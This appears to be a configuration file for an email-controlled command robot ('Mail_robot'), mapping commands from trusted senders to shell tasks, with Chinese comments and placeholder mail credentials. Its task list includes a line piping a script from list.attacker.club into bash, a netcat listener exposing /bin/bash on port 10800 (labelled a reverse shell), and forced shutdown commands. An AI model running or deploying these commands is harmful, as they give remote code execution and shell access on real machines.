[mail]
# 账号密码
IMAP_HOST= imap.exmail.qq.com
email = alert@xxxx.com
password = xxxxxx
SMTP_HOST = smtp.exmail.qq.com

# 只读取信任的邮箱发送的指令
Bind_Sender = admin@xxxx.club,lj@xxxx.com

[task]
# 脚本任务
开始备份 = bash /Users/xxxxx/repo/Mail_robot/1.sh

# Windows关机指令
shutdown = shutdown -s -f -t 1
# Linux关机指令
linux_down = init 0
# 执行远程shell
curl_bash = curl -s http://list.attacker.club/touch.sh | bash
# 一个反弹shell; nc ip_address  10800
my_ladder = nc -vv -l -p 10800 -e /bin/bash
# Close all tasks
clear = pkill nc && pkill python
